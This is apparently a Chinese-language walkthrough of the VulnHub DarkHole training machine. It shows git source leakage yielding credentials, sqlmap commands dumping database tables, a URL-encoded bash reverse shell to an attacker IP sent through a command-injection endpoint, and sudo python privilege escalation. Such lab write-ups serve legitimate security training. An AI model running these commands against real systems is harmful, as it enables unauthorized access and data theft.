VulnHub-DarkHole

前言

  这是打靶训练的第28周,难度中,靶机下载

信息搜集

  nmap扫描结果

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

  非常普通的一个网页,还有右上角有个login登录按钮就没有了
  
  通过dirsearch发现存在.git目录

[21:37:10] 301 -  311B  - /.git  ->  http://10.16.122.62/.git/
[21:37:10] 200 -    3KB - /.git/
[21:37:10] 200 -   41B  - /.git/COMMIT_EDITMSG
[21:37:10] 200 -  130B  - /.git/config
[21:37:10] 200 -    6KB - /.git/objects/
[21:37:10] 200 -    1KB - /.git/refs/
[21:37:10] 200 -   41B  - /.git/refs/heads/master

  
  存在git源码泄露,可以直接使用wget -r http://10.16.122.62/.git/来下载,不用任何工具

  下载完毕后,通过git log查看git提交日志,在最后一次提交中备注:让login.php更安全,那意思是第二次提交的login.php不安全呗
  
  做好备份文件,进入分支版本查看第二次的提交

git clone . backup
cd backup
git checkout a4d900a8d85e8938d3601f3cef113ee293028e10

  得到用户名为:lush@admin.com 密码:321
  
  通过上面账号登录进来,url经典id=1
  
  上sqlmap进行梭哈

python sqlmap.py -u "http://10.16.122.62/dashboard.php?id=1" --cookie="PHPSESSID=rr8uq05109vt 83k8gpgdiv3245" --dbs

  
  查看表

python sqlmap.py -u "http://10.16.122.62/dashboard.php?id=1" --cookie="PHPSESSID=rr8uq05109vt 83k8gpgdiv3245" -D darkhole_2 --tables

  
  查看ssh表数据

python sqlmap.py -u "http://10.16.122.62/dashboard.php?id=1" --cookie="PHPSESSID=rr8uq05109vt 83k8gpgdiv3245" -D darkhole_2 -T ssh --dump

  

提权

方法一

  通过用户名:jehad、密码:fool成功ssh登录。得到有三个用户
  
  通过查看.bash_history文件,这提示太明显了,直接运行命令,以losy用户权限运行
  
  将bash -c 'bash -i >& /dev/tcp/10.16.122.71/4444 0>&1'进行url编码后,完整的反弹shell命令

curl "http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.122.71%2F4444%200%3E%261%27"
python3 -c 'import pty; pty.spawn("/bin/bash")' # 获取tty

  
  cd /home/losy,继续查看.bash_history
  
  获取losy的密码为gang,sudo python3 -c 'import os; os.system("/bin/bash")'成功提权
  

方法二

  在前面的提权过程中,没有用到lama用户,这里我爆破出它的ssh密码为123。提权过程看图,不多解释
  

查看评论 -
评论